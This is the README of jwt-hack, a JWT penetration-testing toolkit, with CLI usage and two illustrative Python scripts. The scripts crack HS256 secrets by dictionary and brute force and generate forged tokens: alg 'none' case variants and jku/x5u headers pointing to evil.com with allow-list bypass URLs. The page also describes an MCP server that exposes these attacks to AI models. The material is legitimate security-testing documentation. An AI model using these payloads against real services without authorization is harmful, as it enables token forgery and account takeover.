# jwt-hack

A high-performance toolkit for testing, analyzing and attacking JSON Web Tokens (JWT). It encodes, decodes, verifies and cracks tokens, generates attack payloads, runs automated vulnerability scans, and exposes the same functionality through a REST API and an MCP (Model Context Protocol) server. Regular JWTs, DEFLATE-compressed JWTs and JWE (JSON Web Encryption) tokens are all supported.

## Installation

Using Cargo:

```bash
cargo install jwt-hack
```

Using Homebrew:

```bash
brew install jwt-hack
```

Using Snap:

```bash
sudo snap install jwt-hack
```

From source:

```bash
git clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .
```

Using Docker:

```bash
docker pull ghcr.io/hahwul/jwt-hack:latest
docker pull hahwul/jwt-hack:v2.4.0
```

## Contributing

jwt-hack is an open-source project made with ❤️. If you want to contribute, please see CONTRIBUTING.md and open a pull request with your contents.

## Modes

| Mode | Description | Support |
|------|-------------|---------|
| Encode | JWT/JWE Encoder | Secret based / Key based / Algorithm / Custom Header / DEFLATE Compression / JWE |
| Decode | JWT/JWE Decoder | Algorithm, Issued At Check, DEFLATE Compression, JWE Structure |
| Verify | JWT Verifier | Secret based / Key based (for asymmetric algorithms) |
| Crack | Secret Cracker | Dictionary Attack / Brute Force / DEFLATE Compression |
| Payload | JWT Attack Payload Generator | none / jku&x5u / alg_confusion / kid_sql / x5c / cty |
| Scan | Vulnerability Scanner | Automated security checks for common JWT vulnerabilities |
| Server | API Server | Run API Server Mode (http://localhost:3000) |
| MCP | Model Context Protocol Server | AI model integration via standardized protocol |

## Usage

### Decode

Decode a JWT to inspect its header, payload and signature. Both regular and DEFLATE-compressed JWTs are accepted; compressed tokens are detected and decompressed automatically. JWE tokens are detected automatically by their 5-part format, and the tool displays the encryption details of the structure. Note that decoding only parses the token; it does not check the signature, so decoded claims are untrusted until verified.

```bash
jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED

# Compressed tokens are detected and decompressed automatically
jwt-hack decode COMPRESSED_JWT_TOKEN

# Decode JWE token structure
jwt-hack decode eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2.eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn
# Shows JWE header, encrypted key, IV, ciphertext, and authentication tag
```

### Encode

Encode a JSON payload into a JWT, signed either with a shared secret (HMAC algorithms) or with a private key (asymmetric algorithms). Use the `--compress` option to apply DEFLATE compression to the JWT payload.

```bash
# Secret based (HMAC)
jwt-hack encode '{"sub":"1234"}' --secret=your-secret

# DEFLATE-compressed payload
jwt-hack encode '{"sub":"1234"}' --secret=your-secret --compress

# Key based: generate a PEM-encoded RSA private key, then sign with RS256
ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key
jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256
```
### Encode a JWE
Create JWE (JSON Web Encryption) tokens for testing encrypted JWT scenarios.
```bash
# Basic JWE encoding
jwt-hack encode '{"sub":"1234", "data":"encrypted"}' --jwe --secret=your-secret

# JWE tokens are encrypted and can only be decrypted with the proper key
jwt-hack encode '{"sensitive":"data"}' --jwe
```

### Verify

Check whether a JWT's signature is valid using the provided secret (HMAC algorithms) or key (asymmetric algorithms).

```bash
# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret

# With Private Key (for asymmetric algorithms like RS256, ES256, EdDSA)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key
```

### Crack

Recover the HMAC secret of a JWT with a dictionary or brute-force attack. Both attack modes also support JWTs compressed with DEFLATE.

```bash
# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
jwt-hack crack -w wordlist.txt COMPRESSED_JWT_TOKEN

# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4
jwt-hack crack -m brute COMPRESSED_JWT_TOKEN --max=4
```
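The following Python example was written for this page and is not code from jwt-hack. It shows what the Decode, Encode, Verify and Crack modes above do for HS256 tokens: base64url and raw-DEFLATE handling, automatic detection of a compressed payload and of the 5-part JWE layout, constant-time HMAC verification that refuses any non-HS256 `alg`, and dictionary and brute-force recovery of the secret (which works unchanged on compressed tokens, because the MAC covers the base64url segments as-is). It assumes the JOSE `"zip":"DEF"` header marker for compressed payloads, which is not necessarily how jwt-hack marks them, and falls back to trying to inflate any payload that is not valid JSON. The secret and claims are constructed; `JWE_SAMPLE` is the dummy JWE from the Decode section.

```python
import base64
import hashlib
import hmac
import itertools
import json
import string
import zlib

# Constructed sample inputs; JWE_SAMPLE is the README's dummy JWE ("alg":"dir", "enc":"A256GCM").
SECRET = "your-secret"
JWE_SAMPLE = ("eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2."
              "eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn")


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def deflate(data: bytes) -> bytes:
    # Raw DEFLATE stream (no zlib header or checksum), as used by the JOSE "zip":"DEF" convention.
    comp = zlib.compressobj(level=9, wbits=-15)
    return comp.compress(data) + comp.flush()


def inflate(data: bytes) -> bytes:
    return zlib.decompress(data, wbits=-15)


def hs256_sign(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()


def encode(payload: dict, secret: str, compress: bool = False) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    body = json.dumps(payload, separators=(",", ":")).encode()
    if compress:
        # ASSUMPTION: "zip":"DEF" marks the compressed payload; jwt-hack's marker may differ.
        header["zip"] = "DEF"
        body = deflate(body)
    head = json.dumps(header, separators=(",", ":")).encode()
    signing_input = b64url_encode(head) + "." + b64url_encode(body)
    return signing_input + "." + b64url_encode(hs256_sign(signing_input.encode(), secret))


def decode(token: str) -> dict:
    """Classify and decode a compact token WITHOUT verifying it (decoding is not authentication)."""
    parts = token.split(".")
    if len(parts) == 5:  # JWE compact serialization: header.encrypted_key.iv.ciphertext.tag
        info = dict(zip(("header", "encrypted_key", "iv", "ciphertext", "tag"), parts))
        info["header"] = json.loads(b64url_decode(parts[0]))
        info["kind"] = "JWE"  # ciphertext stays opaque without the key
        return info
    if len(parts) != 3:
        raise ValueError("expected 3 (JWS) or 5 (JWE) dot-separated parts")
    header = json.loads(b64url_decode(parts[0]))
    raw = b64url_decode(parts[1])
    compressed = header.get("zip") == "DEF"
    if compressed:
        claims = json.loads(inflate(raw))
    else:
        try:
            claims = json.loads(raw)
        except ValueError:
            # Not JSON: treat it as an unmarked DEFLATE payload and inflate it.
            claims = json.loads(inflate(raw))
            compressed = True
    return {"kind": "JWS", "header": header, "payload": claims,
            "compressed": compressed, "signature": parts[2]}


def verify(token: str, secret: str) -> bool:
    """HS256-only verification; rejecting every other alg also blocks alg=none and RS->HS confusion."""
    head, body, sig = token.split(".")
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        return False
    expected = hs256_sign(f"{head}.{body}".encode(), secret)
    return hmac.compare_digest(expected, b64url_decode(sig))


def _signing_parts(token: str):
    head, body, sig = token.split(".")
    return f"{head}.{body}".encode(), b64url_decode(sig)


def crack_dict(token: str, wordlist):
    # The signature is computed over the base64url segments, so a compressed payload needs no special case.
    signing_input, sig = _signing_parts(token)
    for word in wordlist:
        if hmac.compare_digest(hs256_sign(signing_input, word), sig):
            return word
    return None


def crack_brute(token: str, chars: str = string.ascii_lowercase + string.digits, max_len: int = 4):
    signing_input, sig = _signing_parts(token)
    for length in range(1, max_len + 1):
        for combo in itertools.product(chars, repeat=length):
            candidate = "".join(combo)
            if hmac.compare_digest(hs256_sign(signing_input, candidate), sig):
                return candidate
    return None


if __name__ == "__main__":
    token = encode({"sub": "1234"}, SECRET, compress=True)
    print(token)
    print(decode(token))
    print("verify:", verify(token, SECRET))
    print("cracked:", crack_dict(token, ["password", "secret", SECRET]))
    print("jwe:", decode(JWE_SAMPLE)["header"])
```

The brute-force search is deliberately naive; it exists to show why a short HMAC secret falls in seconds, not to compete with the tool.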
### Payload

Generate attack payloads from an existing token (payload types: none, jku&x5u, alg_confusion, kid_sql, x5c, cty). For the jku&x5u payloads, `--jwk-attack` supplies the attacker host and `--jwk-trust` the trusted host.

```bash
jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.com
```
### Scan

Automatically scan JWT tokens for common security issues and vulnerabilities. A full scan includes weak secret detection and attack payload generation; both steps can be skipped or bounded for faster results.

```bash
# Full scan including weak secret detection and payload generation
jwt-hack scan JWT_TOKEN

# Skip secret cracking for faster results
jwt-hack scan JWT_TOKEN --skip-crack

# Skip payload generation
jwt-hack scan JWT_TOKEN --skip-payloads

# Use custom wordlist for weak secret detection
jwt-hack scan JWT_TOKEN -w custom_wordlist.txt

# Limit secret testing attempts
jwt-hack scan JWT_TOKEN --max-crack-attempts 50
```

### Server

Start a local REST API for automation and integrations. To require authentication, start the server with `--api-key` and include the `X-API-KEY` header in requests. A key passed on the command line is visible to other local users in the process list, so treat it as a local access control rather than a secret.

```bash
# Start on localhost:3000 with API key protection
jwt-hack server --api-key your-api-key

# Example request (must include X-API-KEY when --api-key is set)
curl -s http://127.0.0.1:3000/health -H 'X-API-KEY: your-api-key'
```
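The following Python example was written for this page and is not code from jwt-hack. It illustrates the two simplest payload families from the Payload mode that Scan also generates: the `none` family (signature removed, with case variants of `alg` that slip past a naive `alg == "none"` denylist) and the `jku`/`x5u` family, where the header's key-set or certificate URL is pointed at a host the tester controls. The attacker and trusted host names follow the `--jwk-attack evil.com --jwk-trust trusted.com` invocation above; the specific URL-confusion shapes that combine the two hosts are this example's own illustration of allow-list bypass testing, not a list taken from jwt-hack. The jku/x5u payloads keep the original signature as a placeholder: in a real test the token is re-signed with the private key whose public half is served at that URL. The sample token is the one from the Decode section.

```python
import base64
import json

# Constructed input: the README's sample token (its signature is a placeholder).
SAMPLE = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def header_of(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[0]))


def _with_header(token: str, header: dict, signature: str) -> str:
    # Keep the original payload segment untouched; only the header (and signature) change.
    _, body, _ = token.split(".")
    head = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    return f"{head}.{body}.{signature}"


def none_payloads(token: str) -> list:
    """'none' family: empty signature plus alg spellings that evade case-sensitive denylists."""
    header = header_of(token)
    return [_with_header(token, dict(header, alg=alg), "")
            for alg in ("none", "None", "NONE", "nOnE")]


def jku_x5u_payloads(token: str, attacker_host: str, trusted_host: str = None,
                     protocol: str = "https") -> list:
    """jku/x5u family: returns (header_param, url, token) tuples.

    The signature is left as-is; a working payload must be re-signed with the key
    that matches the JWK or certificate hosted at the injected URL.
    """
    header = header_of(token)
    urls = [f"{protocol}://{attacker_host}/jwks.json"]
    if trusted_host:
        # ASSUMPTION: illustrative URL-parser confusion shapes for allow-list bypass testing;
        # these are this example's own, not jwt-hack's generated list.
        urls += [
            f"{protocol}://{trusted_host}@{attacker_host}/jwks.json",
            f"{protocol}://{attacker_host}/jwks.json#{trusted_host}",
            f"{protocol}://{attacker_host}/jwks.json?{trusted_host}",
            f"{protocol}://{trusted_host}.{attacker_host}/jwks.json",
        ]
    _, _, sig = token.split(".")
    out = []
    for param in ("jku", "x5u"):
        for url in urls:
            new_header = dict(header)
            new_header[param] = url
            out.append((param, url, _with_header(token, new_header, sig)))
    return out


if __name__ == "__main__":
    for p in none_payloads(SAMPLE):
        print("none:", p)
    for param, url, tok in jku_x5u_payloads(SAMPLE, "evil.com", "trusted.com"):
        print(f"{param} -> {url}: {tok}")
```

Each generated token is meant to be replayed against the target and judged by whether the server accepts it; a server that accepts any of the `none` variants, or fetches keys from the attacker-controlled URL, has the corresponding vulnerability.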
### MCP Server

jwt-hack can run as an MCP (Model Context Protocol) server, allowing AI models to interact with JWT functionality through a standardized protocol.

```bash
# Start MCP server (communicates via stdio)
jwt-hack mcp
```

The MCP server exposes the following tools:

| Tool | Description | Parameters |
|------|-------------|------------|
| decode | Decode JWT tokens | token (string) |
| encode | Encode JSON to JWT | json (string), secret (optional), algorithm (default: HS256), no_signature (boolean) |
| verify | Verify JWT signatures | token (string), secret (optional), validate_exp (boolean) |
| crack | Crack JWT tokens | token (string), mode (dict/brute), chars (string), max (number) |
| payload | Generate attack payloads | token (string), target (string), jwk_attack (optional), jwk_protocol (default: https) |

The MCP server is designed to be used by AI models and MCP clients. Each tool accepts JSON parameters and returns structured responses.

Decode Tool:

```json
{
  "name": "decode",
  "arguments": {
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
  }
}
```

Encode Tool:

```json
{
  "name": "encode",
  "arguments": {
    "json": "{\"sub\":\"1234\",\"name\":\"test\"}",
    "secret": "mysecret",
    "algorithm": "HS256"
  }
}
```

#### Client integration

You can connect jwt-hack's MCP server to popular MCP-enabled clients. Make sure the jwt-hack binary is on your system and accessible by the client.

VSCode:

```json
{
  "servers": {
    "jwt-hack": {
      "type": "stdio",
      "command": "jwt-hack",
      "args": [
        "mcp"
      ]
    }
  },
  "inputs": []
}
```

Claude Desktop:

```json
{
  "mcpServers": {
    "jwt-hack": {
      "command": "jwt-hack",
      "args": ["mcp"],
      "env": {}
    }
  }
}
```

## DEFLATE Compression Support

The jwt-hack toolkit supports DEFLATE compression for JWTs:

- Use the `--compress` option with `encode` to generate compressed JWTs.
- The `decode` and `crack` modes automatically detect and handle compressed JWTs.
